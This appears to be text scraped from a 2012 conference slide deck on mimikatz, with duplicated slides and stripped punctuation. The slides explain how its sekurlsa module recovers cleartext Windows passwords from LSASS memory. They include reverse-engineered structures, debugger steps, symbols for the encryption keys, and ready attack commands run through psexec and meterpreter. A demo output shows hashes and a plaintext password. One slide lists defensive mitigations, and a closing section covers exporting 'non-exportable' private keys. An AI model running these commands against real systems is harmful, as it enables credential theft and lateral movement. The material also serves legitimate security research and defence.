07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
